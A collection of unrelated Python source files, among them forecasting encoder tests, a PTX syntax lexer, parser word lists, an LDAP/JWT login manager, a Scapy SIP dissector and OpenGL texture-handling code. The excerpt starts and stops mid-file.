le.fit(df1)
np.testing.assert_array_almost_equal(le.transform(df2).values, expected_values)
def test_new_value_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform correct works with unknown values."""
expected_values = np.array(
[
[5.0, 1.0, 1.0, 0.0, 5.0, 4.0, 1.0, 0.0],
[8.0, 2.0, 0.0, 1.0, 0.0, 5.0, 0.0, 0.0],
[9.0, 3.0, 0.0, 0.0, 0.0, 6.0, 0.0, 0.0],
]
)
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
np.testing.assert_array_almost_equal(ohe.transform(df2).values, expected_values)
def test_naming_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform gives the correct columns."""
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
segments = ["segment_0", "segment_1"]
target = ["target", "targets_0", "targets_1", "regressor_0"]
assert set([(i, j) for i in segments for j in target]) == set(ohe.transform(df2).columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_ohe_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test OneHotEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
ohe = OneHotEncoderTransform(in_column=in_column)
ohe.fit(df)
answer = set(
list(df["segment_0"].columns) + [prefix + str(ohe.__repr__()) + "_0", prefix + str(ohe.__repr__()) + "_1"]
)
assert answer == set(ohe.transform(df)["segment_0"].columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_label_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test LabelEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
le = LabelEncoderTransform(in_column=in_column)
le.fit(df)
answer = set(list(df["segment_0"].columns) + [prefix + str(le.__repr__())])
assert answer == set(le.transform(df)["segment_0"].columns.values)
@pytest.fixture
def ts_for_ohe_sanity():
df_to_forecast = generate_const_df(periods=100, start_time="2021-01-01", scale=0, n_segments=1)
df_regressors = generate_periodic_df(periods=120, start_time="2021-01-01", scale=10, period=4, n_segments=1)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + [f"regressor_{i}" for i in range(1)]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
rng = np.random.default_rng(12345)
def f(x):
return x ** 2 + rng.normal(0, 0.01)
df_to_forecast["segment_0", "target"] = df_regressors["segment_0"]["regressor_0"][:100].apply(f)
ts = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return ts
def test_ohe_sanity(ts_for_ohe_sanity):
"""Test for correct work in the full forecasting pipeline."""
horizon = 10
train_ts, test_ts = ts_for_ohe_sanity.train_test_split(test_size=horizon)
ohe = OneHotEncoderTransform(in_column="regressor_0")
filt = FilterFeaturesTransform(exclude=["regressor_0"])
train_ts.fit_transform([ohe, filt])
model = LinearPerSegmentModel()
model.fit(train_ts)
future_ts = train_ts.make_future(horizon)
forecast_ts = model.forecast(future_ts)
r2 = R2()
assert 1 - r2(test_ts, forecast_ts)["segment_0"] < 1e-5
|
30845
|
from pygments.lexer import RegexLexer, include, words
from pygments.token import *
# https://docs.nvidia.com/cuda/parallel-thread-execution/index.html
class CustomLexer(RegexLexer):
string = r'"[^"]*?"'
followsym = r'[a-zA-Z0-9_$]*'
identifier = r'(?:[a-zA-Z]' + followsym + r'| [_$%]' + followsym + r')'
tokens = {
'root': [
include('whitespace'),
(r'%' + identifier, Name.Variable),
include('definition'),
include('statement'),
include('type'),
(identifier, Name.Variable),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\b\d+[LlUu]*\b', Number.Integer),
(r'[&|^+*/%=~-]', Operator),
(r'[()\[\]\{\},.;<>@]', Punctuation),
],
'whitespace': [
(r'(\n|\s)+', Text),
(r'/\*.*?\*/', Comment.Multiline),
(r'//.*?\n', Comment.Single),
],
'definition': [
(words(('func', 'reg'), prefix=r'\.', suffix=r'\b'), Keyword.Reserved),
(r'^' + identifier + r':', Name.Label),
],
'statement': [
# directive
(words((
'address_size', 'file', 'minnctapersm', 'target', 'align', 'func', 'param',
'tex', 'branchtarget', 'global', 'pragma', 'version', 'callprototype',
'loc', 'reg', 'visible', 'calltargets', 'local', 'reqntid', 'weak', 'const',
'maxnctapersm', 'section', 'entry', 'maxnreg', 'shared', 'extern',
'maxntid', 'sreg', ), prefix=r'\.', suffix=r'\b'), Keyword),
# instruction
(words((
'abs', 'div', 'or', 'sin', 'add', 'ex2', 'pmevent', 'slct', 'vmad', 'addc',
'exit', 'popc', 'sqrt', 'vmax', 'and', 'fma', 'prefetch', 'st', 'atom',
'isspacep', 'prefetchu', 'sub', 'vmin', 'bar', 'ld', 'prmt', 'subc', 'bfe',
'ldu', 'rcp', 'suld', 'vote', 'bfi', 'lg2', 'red', 'suq', 'vset', 'bfind',
'mad', 'rem', 'sured', 'bret', 'sust', 'vshl', 'brev', 'madc', 'rsqrt',
'testp', 'vshr', 'brkpt', 'max', 'sad', 'tex', 'vsub', 'call', 'membar',
'selp', 'tld4', 'clz', 'min', 'set', 'trap', 'xor', 'cnot', 'mov', 'setp',
'txq', 'copysign', 'mul', 'shf', 'vabsdiff', 'cos', 'shfl', 'cvta', 'not',
'shr', 'cvt', 'neg', 'shl', 'vadd'), prefix=r'\b', suffix=r'[\.\w]+\b'), Keyword),
(words((
'vavrg', 'vmax', 'vmin', 'vset', 'mad', 'vsub', 'mul', 'vabsdiff',
'vadd'), prefix=r'\b', suffix=r'[24]\b'), Keyword),
],
'type': [
(words((
's8', 's16', 's32', 's64',
'u8', 'u16', 'u32', 'u64',
'f16', 'f16x2', 'f32', 'f64',
'b8', 'b16', 'b32', 'b64',
'pred'), prefix=r'\.', suffix=r'\b'), Keyword.Type),
],
}
|
30859
|
singular = [
'this','as','is','thesis','hypothesis','less','obvious','us','yes','cos',
'always','perhaps','alias','plus','apropos',
'was','its','bus','his','is','us',
'this','thus','axis','bias','minus','basis',
'praxis','status','modulus','analysis',
'aparatus'
]
invariable = [ #frozen_list - cannot be given a synonym
'a','an','all','and','any','are','as','assume','be','by',
'case','classifier',
'coercion','conjecture','contradiction','contrary','corollary','declare',
'def',
'define','defined','definition','denote','division','do','document',
'does','dump','each','else','end','enddivision','endsection',
'endsubdivision','endsubsection','endsubsubsection','equal',
'equation','error','enter','every','exhaustive','exist','exit',
'false','fix','fixed','for','forall','formula','fun','function','has','have',
'having','hence','holding','hypothesis','if','iff','in','inferring',
'indeed','induction','inductive','introduce','is','it','left','lemma',
'let','library','make','map','match','moreover','mutual','namespace',
'no','not','notational','notation',
'notationless','obvious','of','off','on','only','ontored','or','over',
'pairwise','parameter','precedence','predicate','printgoal',
'proof','prop','property','prove','proposition',
'propped','qed','quotient','read','record','register','recursion','right',
'said','say','section','show','some','stand','structure','subdivision',
'subsection','subsubsection','such','suppose','synonym','take','that',
'the','then','theorem','there','therefore','thesis','this','timelimit',
'to','total','trivial','true','type','unique','us',
'warning','we','well','welldefined','well_defined','well_propped',
'where','with','write','wrong','yes',
#(* plural handled by sing 'classifiers', 'exists','implement',
# 'parameters','properties','propositions','synonyms','types',
]
transition = [ #phrase_list_transition_words
'a basic fact is','accordingly','additionally','again','also','and yet','as a result',
'as usual','as we have seen','as we see','at the same time','besides','but',
'by definition','certainly','clearly','computations show','consequently',
'conversely','equally important','explicitly','finally','first','for example',
'for instance','for simplicity','for that reason','for this purpose','further',
'furthermore','generally','hence','here','however','importantly','in addition',
'in any event','in brief','in consequence','in contrast','in contrast to this',
'in each case','in fact','in general','in other words','in particular','in short',
'in sum','in summary','in the present case','in the same way','in this computation',
'in this sense','indeed','it follows','it is clear','it is enough to show',
'it is known','it is routine','it is trivial to see','it is understood',
'it turns out','last','likewise','more precisely','moreover','most importantly',
'neverthess','next','nonetheless','note',
'notice','now','observe','obviously','of course','on the contrary','on the other hand',
'on the whole','otherwise','second','similarly','so','specifically','still',
'that is','the point is','then','therefore','third','this gives','this implies',
'this means','this yields','thus','thus far','to begin with','to this end',
'trivially','we claim','we emphasize','we first show','we get','we have seen',
'we have','we know','we check','we may check','we obtain','we remark','we say','we see',
'we show','we understand','we write','recall','we recall',
'without loss of generality','yet'
]
preposition_list = [
'aboard','about','above','according to', 'across', 'against', 'ahead of',
'along','alongside','amid','amidst','among','around','at','atop','away from',
'before',
'behind','below','beneath','beside','between','beyond','by','concerning','despite',
'except','except at','excluding','following',
'from','in','in addition to','in place of','in regard to',
'inside','instead of','into','near','next to','of',
'off','on','on behalf of','on top of','onto','opposite','out','out of',
'outside','outside of',
'over','owing to','per','prior to','regarding','save','through',
'throughout','till','to','towards','under','until',
'up','up to','upon','with','with respect to','wrt','within','without'
# 'for', 'as', 'like', 'after', 'round', 'plus', 'since', 'than', 'past',
# 'during',
# synonyms with\~respect\~to/wrt
]
prim_list = [
'prim_classifier',
'prim_term_op_controlseq',
'prim_binary_relation_controlseq',
'prim_propositional_op_controlseq',
'prim_type_op_controlseq',
'prim_term_controlseq',
'prim_type_controlseq',
'prim_lambda_binder',
'prim_pi_binder',
'prim_binder_prop',
'prim_typed_name',
'prim_adjective',
'prim_adjective_multisubject',
'prim_simple_adjective',
'prim_simple_adjective_multisubject',
'prim_field_term_accessor',
'prim_field_type_accessor',
'prim_field_prop_accessor',
'prim_definite_noun',
'prim_identifier_term',
'prim_identifier_type',
'prim_possessed_noun',
'prim_verb',
'prim_verb_multisubject',
'prim_structure',
'prim_type_op',
'prim_type_word',
'prim_term_op',
'prim_binary_relation_op',
'prim_propositional_op',
'prim_relation'
]
|
30895
|
from zerocopy import send_from
from socket import *
s = socket(AF_INET, SOCK_STREAM)
s.bind(('', 25000))
s.listen(1)
c,a = s.accept()
import numpy
a = numpy.arange(0.0, 50000000.0)
send_from(a, c)
c.close()
|
30937
|
if __name__ == '__main__':
n = int(input())
s = set()
for i in range (n):
s.add(input())
print((len(s)))
|
30941
|
import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
return user
|
30972
|
def main():
a = ["a", 1, "5", 2.3, 1.2j]
some_condition = True
for x in a:
# If it's all isinstance, we can use a type switch
if isinstance(x, (str, float)):
print("String or float!")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!")
print(":)")
# If it's got mixed expressions, we will inline a switch for the isinstance expression
if isinstance(x, str) and some_condition:
print("String")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!!")
print(":O")
if __name__ == '__main__':
main()
|
31027
|
import time
import os
from pykafka.test.kafka_instance import KafkaInstance, KafkaConnection
def get_cluster():
"""Gets a Kafka cluster for testing, using one already running is possible.
An already-running cluster is determined by environment variables:
BROKERS, ZOOKEEPER, KAFKA_BIN. This is used primarily to speed up tests
in our Travis-CI environment.
"""
if os.environ.get('BROKERS', None) and \
os.environ.get('ZOOKEEPER', None) and \
os.environ.get('KAFKA_BIN', None):
# Broker is already running. Use that.
return KafkaConnection(os.environ['KAFKA_BIN'],
os.environ['BROKERS'],
os.environ['ZOOKEEPER'],
os.environ.get('BROKERS_SSL', None))
else:
return KafkaInstance(num_instances=3)
def stop_cluster(cluster):
"""Stop a created cluster, or merely flush a pre-existing one."""
if isinstance(cluster, KafkaInstance):
cluster.terminate()
else:
cluster.flush()
def retry(assertion_callable, retry_time=10, wait_between_tries=0.1, exception_to_retry=AssertionError):
"""Retry assertion callable in a loop"""
start = time.time()
while True:
try:
return assertion_callable()
except exception_to_retry as e:
if time.time() - start >= retry_time:
raise e
time.sleep(wait_between_tries)
|
31031
|
import base64
from scapy.layers.inet import *
from scapy.layers.dns import *
import dissector
class SIPStartField(StrField):
"""
field class for handling sip start field
@attention: it inherets StrField from Scapy library
"""
holds_packets = 1
name = "SIPStartField"
def getfield(self, pkt, s):
"""
this method will get the packet, takes what does need to be
taken and let the remaining go, so it returns two values.
first value which belongs to this field and the second is
the remaining which does need to be dissected with
other "field classes".
@param pkt: holds the whole packet
@param s: holds only the remaining data which is not dissected yet.
"""
cstream = -1
if pkt.underlayer.name == "TCP":
cstream = dissector.check_stream(\
pkt.underlayer.underlayer.fields["src"],\
pkt.underlayer.underlayer.fields["dst"],\
pkt.underlayer.fields["sport"],\
pkt.underlayer.fields["dport"],\
pkt.underlayer.fields["seq"], s)
if not cstream == -1:
s = cstream
remain = ""
value = ""
ls = s.splitlines(True)
f = ls[0].split()
if "SIP" in f[0]:
ls = s.splitlines(True)
f = ls[0].split()
length = len(f)
value = ""
if length == 3:
value = "SIP-Version:" + f[0] + ", Status-Code:" +\
f[1] + ", Reason-Phrase:" + f[2]
ls.remove(ls[0])
for element in ls:
remain = remain + element
else:
value = ls[0]
ls.remove(ls[0])
for element in ls:
remain = remain + element
return remain, value
elif "SIP" in f[2]:
ls = s.splitlines(True)
f = ls[0].split()
length = len(f)
value = []
if length == 3:
value = "Method:" + f[0] + ", Request-URI:" +\
f[1] + ", SIP-Version:" + f[2]
ls.remove(ls[0])
for element in ls:
remain = remain + element
else:
value = ls[0]
ls.remove(ls[0])
for element in ls:
remain = remain + element
return remain, value
else:
return s, ""
class SIPMsgField(StrField):
"""
field class for handling the body of sip packets
@attention: it inherets StrField from Scapy library
"""
holds_packets = 1
name = "SIPMsgField"
myresult = ""
def __init__(self, name, default):
"""
class constructor, for initializing instance variables
@param name: name of the field
@param default: Scapy has many formats to represent the data
internal, human and machine. anyways you may sit this param to None.
"""
self.name = name
self.fmt = "!B"
Field.__init__(self, name, default, "!B")
def getfield(self, pkt, s):
"""
this method will get the packet, takes what does need to be
taken and let the remaining go, so it returns two values.
first value which belongs to this field and the second is
the remaining which does need to be dissected with
other "field classes".
@param pkt: holds the whole packet
@param s: holds only the remaining data which is not dissected yet.
"""
if s.startswith("\r\n"):
s = s.lstrip("\r\n")
if s == "":
return "", ""
self.myresult = ""
for c in s:
self.myresult = self.myresult + base64.standard_b64encode(c)
return "", self.myresult
class SIPField(StrField):
"""
field class for handling the body of sip fields
@attention: it inherets StrField from Scapy library
"""
holds_packets = 1
name = "SIPField"
def getfield(self, pkt, s):
"""
this method will get the packet, takes what does need to be
taken and let the remaining go, so it returns two values.
first value which belongs to this field and the second is
the remaining which does need to be dissected with
other "field classes".
@param pkt: holds the whole packet
@param s: holds only the remaining data which is not dissected yet.
"""
if self.name == "unknown-header(s): ":
remain = ""
value = []
ls = s.splitlines(True)
i = -1
for element in ls:
i = i + 1
if element == "\r\n":
return s, []
elif element != "\r\n" and (": " in element[:10])\
and (element[-2:] == "\r\n"):
value.append(element)
ls.remove(ls[i])
remain = ""
unknown = True
for element in ls:
if element != "\r\n" and (": " in element[:15])\
and (element[-2:] == "\r\n") and unknown:
value.append(element)
else:
unknow = False
remain = remain + element
return remain, value
return s, []
remain = ""
value = ""
ls = s.splitlines(True)
i = -1
for element in ls:
i = i + 1
if element.upper().startswith(self.name.upper()):
value = element
value = value.strip(self.name)
ls.remove(ls[i])
remain = ""
for element in ls:
remain = remain + element
return remain, value[len(self.name) + 1:]
return s, ""
def __init__(self, name, default, fmt, remain=0):
"""
class constructor for initializing the instance variables
@param name: name of the field
@param default: Scapy has many formats to represent the data
internal, human and machine. anyways you may sit this param to None.
@param fmt: specifying the format, this has been set to "H"
@param remain: this parameter specifies the size of the remaining
data so make it 0 to handle all of the data.
"""
self.name = name
StrField.__init__(self, name, default, fmt, remain)
class SIP(Packet):
"""
class for handling the body of sip packets
@attention: it inherets Packet from Scapy library
"""
name = "sip"
fields_desc = [SIPStartField("start-line: ", "", "H"),
SIPField("accept: ", "", "H"),
SIPField("accept-contact: ", "", "H"),
SIPField("accept-encoding: ", "", "H"),
SIPField("accept-language: ", "", "H"),
SIPField("accept-resource-priority: ", "", "H"),
SIPField("alert-info: ", "", "H"),
SIPField("allow: ", "", "H"),
SIPField("allow-events: ", "", "H"),
SIPField("authentication-info: ", "", "H"),
SIPField("authorization: ", "", "H"),
SIPField("call-id: ", "", "H"),
SIPField("call-info: ", "", "H"),
SIPField("contact: ", "", "H"),
SIPField("content-disposition: ", "", "H"),
SIPField("content-encoding: ", "", "H"),
SIPField("content-language: ", "", "H"),
SIPField("content-length: ", "", "H"),
SIPField("content-type: ", "", "H"),
SIPField("cseq: ", "", "H"),
SIPField("date: ", "", "H"),
SIPField("error-info: ", "", "H"),
SIPField("event: ", "", "H"),
SIPField("expires: ", "", "H"),
SIPField("from: ", "", "H"),
SIPField("in-reply-to: ", "", "H"),
SIPField("join: ", "", "H"),
SIPField("max-forwards: ", "", "H"),
SIPField("mime-version: ", "", "H"),
SIPField("min-expires: ", "", "H"),
SIPField("min-se: ", "", "H"),
SIPField("organization: ", "", "H"),
SIPField("p-access-network-info: ", "", "H"),
SIPField("p-asserted-identity: ", "", "H"),
SIPField("p-associated-uri: ", "", "H"),
SIPField("p-called-party-id: ", "", "H"),
SIPField("p-charging-function-addresses: ", "", "H"),
SIPField("p-charging-vector: ", "", "H"),
SIPField("p-dcs-trace-party-id: ", "", "H"),
SIPField("p-dcs-osps: ", "", "H"),
SIPField("p-dcs-billing-info: ", "", "H"),
SIPField("p-dcs-laes: ", "", "H"),
SIPField("p-dcs-redirect: ", "", "H"),
SIPField("p-media-authorization: ", "", "H"),
SIPField("p-preferred-identity: ", "", "H"),
SIPField("p-visited-network-id: ", "", "H"),
SIPField("path: ", "", "H"),
SIPField("priority: ", "", "H"),
SIPField("privacy: ", "", "H"),
SIPField("proxy-authenticate: ", "", "H"),
SIPField("proxy-authorization: ", "", "H"),
SIPField("proxy-require: ", "", "H"),
SIPField("rack: ", "", "H"),
SIPField("reason: ", "", "H"),
SIPField("record-route: ", "", "H"),
SIPField("referred-by: ", "", "H"),
SIPField("reject-contact: ", "", "H"),
SIPField("replaces: ", "", "H"),
SIPField("reply-to: ", "", "H"),
SIPField("request-disposition: ", "", "H"),
SIPField("require: ", "", "H"),
SIPField("resource-priority: ", "", "H"),
SIPField("retry-after: ", "", "H"),
SIPField("route: ", "", "H"),
SIPField("rseq: ", "", "H"),
SIPField("security-client: ", "", "H"),
SIPField("security-server: ", "", "H"),
SIPField("security-verify: ", "", "H"),
SIPField("server: ", "", "H"),
SIPField("service-route: ", "", "H"),
SIPField("session-expires: ", "", "H"),
SIPField("sip-etag: ", "", "H"),
SIPField("sip-if-match: ", "", "H"),
SIPField("subject: ", "", "H"),
SIPField("subscription-state: ", "", "H"),
SIPField("supported: ", "", "H"),
SIPField("timestamp: ", "", "H"),
SIPField("to: ", "", "H"),
SIPField("unsupported: ", "", "H"),
SIPField("user-agent: ", "", "H"),
SIPField("via: ", "", "H"),
SIPField("warning: ", "", "H"),
SIPField("www-authenticate: ", "", "H"),
SIPField("refer-to: ", "", "H"),
SIPField("history-info: ", "", "H"),
SIPField("unknown-header(s): ", "", "H"),
SIPMsgField("message-body: ", "")]
bind_layers(TCP, SIP, sport=5060)
bind_layers(TCP, SIP, dport=5060)
bind_layers(UDP, SIP, sport=5060)
bind_layers(UDP, SIP, dport=5060)
|
31105
|
import abc
import logging
from datetime import datetime
from .log_adapter import adapt_log
LOGGER = logging.getLogger(__name__)
class RunnerWrapper(abc.ABC):
""" Runner wrapper class """
log = adapt_log(LOGGER, 'RunnerWrapper')
def __init__(self, func_runner, runner_id, key, tracker, log_exception=True):
""" Runner wrapper initializer
Args:
func_runner (FuncRunner): FuncRunner instance
runner_id (int): runner id
key (str): key to store the function output in output dict
tracker (dict): tracker dict
"""
self.func_runner = func_runner
self.id = runner_id
self.tracker = tracker
self.log_exception = log_exception
self.key = key
self.runner = None
self.__initialize_tracker()
def __str__(self):
return "<RunnerWrapper %s[#%s] %s>" % (self.key, self.id, self.func_runner)
def __initialize_tracker(self):
self.tracker[self.key] = dict()
def __update_tracker(self, started, finished, output, got_error, error):
""" Updates status in output dict """
self.tracker[self.key] = {
"started_time": started,
"finished_time": finished,
"execution_time": (finished - started).total_seconds(),
"output": output,
"got_error": got_error,
"error": error
}
def is_tracker_updated(self):
return True if self.tracker[self.key] else False
def run(self):
""" Runs function runner """
output, error, got_error = None, None, False
started = datetime.now()
try:
output = self.func_runner.run()
except Exception as e:
got_error = True
error = str(e)
if self.log_exception:
self.log.exception("Encountered an exception on {} {}".format(self, e))
finally:
finished = datetime.now()
self.__update_tracker(started, finished, output, got_error, error)
def join(self):
self.runner.join()
@abc.abstractmethod
def start(self):
""" Starts runner thread """
pass
@abc.abstractmethod
def is_running(self):
""" Returns True if runner is active else False """
pass
|
31111
|
import traceback
import copy
import gc
from ctypes import c_void_p
import itertools
import array
import math
import numpy as np
from OpenGL.GL import *
from PyEngine3D.Common import logger
from PyEngine3D.Utilities import Singleton, GetClassName, Attributes, Profiler
from PyEngine3D.OpenGLContext import OpenGLContext
def get_numpy_dtype(data_type):
if GL_BYTE == data_type:
return np.int8
elif GL_UNSIGNED_BYTE == data_type:
return np.uint8
elif GL_UNSIGNED_BYTE == data_type:
return np.uint8
elif GL_SHORT == data_type:
return np.int16
elif GL_UNSIGNED_SHORT == data_type:
return np.uint16
elif GL_INT == data_type:
return np.int32
elif GL_UNSIGNED_INT == data_type:
return np.uint32
elif GL_UNSIGNED_INT64 == data_type:
return np.uint64
elif GL_FLOAT == data_type:
return np.float32
elif GL_DOUBLE == data_type:
return np.float64
logger.error('Cannot convert to numpy dtype. UNKOWN DATA TYPE(%s)', data_type)
return np.uint8
def get_internal_format(str_image_mode):
if str_image_mode == "RGBA":
return GL_RGBA8
elif str_image_mode == "RGB":
return GL_RGB8
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_R8
else:
logger.error("get_internal_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA8
def get_texture_format(str_image_mode):
if str_image_mode == "RGBA":
# R,G,B,A order. GL_BGRA is faster than GL_RGBA
return GL_RGBA # GL_BGRA
elif str_image_mode == "RGB":
return GL_RGB
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_RED
else:
logger.error("get_texture_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA
def get_image_mode(texture_internal_format):
if texture_internal_format in (GL_RGBA, GL_BGRA):
return "RGBA"
elif texture_internal_format in (GL_RGB, GL_BGR):
return "RGB"
elif texture_internal_format == GL_RG:
return "RG"
elif texture_internal_format in (GL_R8, GL_R16F, GL_RED, GL_DEPTH_STENCIL, GL_DEPTH_COMPONENT):
return "R"
elif texture_internal_format == GL_LUMINANCE:
return "L"
else:
logger.error("get_image_mode::unknown image format ( %s )" % texture_internal_format)
return "RGBA"
def CreateTexture(**texture_datas):
texture_class = texture_datas.get('texture_type', Texture2D)
if texture_class is not None:
if type(texture_class) is str:
texture_class = eval(texture_class)
return texture_class(**texture_datas)
return None
class Texture:
target = GL_TEXTURE_2D
default_wrap = GL_REPEAT
use_glTexStorage = False
def __init__(self, **texture_data):
self.name = texture_data.get('name')
self.attachment = False
self.image_mode = "RGBA"
self.internal_format = GL_RGBA8
self.texture_format = GL_RGBA
self.sRGB = False
self.clear_color = None
self.multisample_count = 0
self.width = 0
self.height = 0
self.depth = 1
self.data_type = GL_UNSIGNED_BYTE
self.min_filter = GL_LINEAR_MIPMAP_LINEAR
self.mag_filter = GL_LINEAR
self.enable_mipmap = False
self.wrap = self.default_wrap
self.wrap_s = self.default_wrap
self.wrap_t = self.default_wrap
self.wrap_r = self.default_wrap
self.buffer = -1
self.sampler_handle = -1
self.attribute = Attributes()
self.create_texture(**texture_data)
def create_texture(self, **texture_data):
if self.buffer != -1:
self.delete()
self.attachment = False
self.image_mode = texture_data.get('image_mode')
self.internal_format = texture_data.get('internal_format')
self.texture_format = texture_data.get('texture_format')
self.sRGB = texture_data.get('sRGB', False)
self.clear_color = texture_data.get('clear_color')
self.multisample_count = 0
if self.internal_format is None and self.image_mode:
self.internal_format = get_internal_format(self.image_mode)
if self.texture_format is None and self.image_mode:
self.texture_format = get_texture_format(self.image_mode)
if self.image_mode is None and self.texture_format:
self.image_mode = get_image_mode(self.texture_format)
# Convert to sRGB
if self.sRGB:
if self.internal_format == GL_RGB:
self.internal_format = GL_SRGB8
elif self.internal_format == GL_RGBA:
self.internal_format = GL_SRGB8_ALPHA8
if GL_RGBA == self.internal_format:
self.internal_format = GL_RGBA8
if GL_RGB == self.internal_format:
self.internal_format = GL_RGB8
self.width = int(texture_data.get('width', 0))
self.height = int(texture_data.get('height', 0))
self.depth = int(max(1, texture_data.get('depth', 1)))
self.data_type = texture_data.get('data_type', GL_UNSIGNED_BYTE)
self.min_filter = texture_data.get('min_filter', GL_LINEAR_MIPMAP_LINEAR)
self.mag_filter = texture_data.get('mag_filter', GL_LINEAR) # GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR, GL_NEAREST
mipmap_filters = (GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR_MIPMAP_NEAREST,
GL_NEAREST_MIPMAP_LINEAR, GL_NEAREST_MIPMAP_NEAREST)
self.enable_mipmap = self.min_filter in mipmap_filters
if self.target == GL_TEXTURE_2D_MULTISAMPLE:
self.enable_mipmap = False
self.wrap = texture_data.get('wrap', self.default_wrap) # GL_REPEAT, GL_CLAMP
self.wrap_s = texture_data.get('wrap_s')
self.wrap_t = texture_data.get('wrap_t')
self.wrap_r = texture_data.get('wrap_r')
self.buffer = -1
self.sampler_handle = -1
# texture parameter overwrite
# self.sampler_handle = glGenSamplers(1)
# glSamplerParameteri(self.sampler_handle, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
# glBindSampler(0, self.sampler_handle)
logger.info("Create %s : %s %dx%dx%d %s mipmap(%s)." % (
GetClassName(self), self.name, self.width, self.height, self.depth, str(self.internal_format),
'Enable' if self.enable_mipmap else 'Disable'))
self.attribute = Attributes()
def __del__(self):
pass
def delete(self):
logger.info("Delete %s : %s" % (GetClassName(self), self.name))
glDeleteTextures([self.buffer, ])
self.buffer = -1
def get_texture_info(self):
return dict(
texture_type=self.__class__.__name__,
width=self.width,
height=self.height,
depth=self.depth,
image_mode=self.image_mode,
internal_format=self.internal_format,
texture_format=self.texture_format,
data_type=self.data_type,
min_filter=self.min_filter,
mag_filter=self.mag_filter,
wrap=self.wrap,
wrap_s=self.wrap_s,
wrap_t=self.wrap_t,
wrap_r=self.wrap_r,
)
def get_save_data(self):
save_data = self.get_texture_info()
data = self.get_image_data()
if data is not None:
save_data['data'] = data
return save_data
def get_mipmap_size(self, level=0):
if 0 < level:
divider = 2.0 ** level
width = max(1, int(self.width / divider))
height = max(1, int(self.height / divider))
return width, height
return self.width, self.height
def get_image_data(self, level=0):
if self.target not in (GL_TEXTURE_2D, GL_TEXTURE_2D_ARRAY, GL_TEXTURE_3D):
return None
level = min(level, self.get_mipmap_count())
dtype = get_numpy_dtype(self.data_type)
try:
glBindTexture(self.target, self.buffer)
data = OpenGLContext.glGetTexImage(self.target, level, self.texture_format, self.data_type)
# convert to numpy array
if type(data) is bytes:
data = np.fromstring(data, dtype=dtype)
else:
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
return data
except:
logger.error(traceback.format_exc())
logger.error('%s failed to get image data.' % self.name)
logger.info('Try to glReadPixels.')
glBindTexture(self.target, self.buffer)
fb = glGenFramebuffers(1)
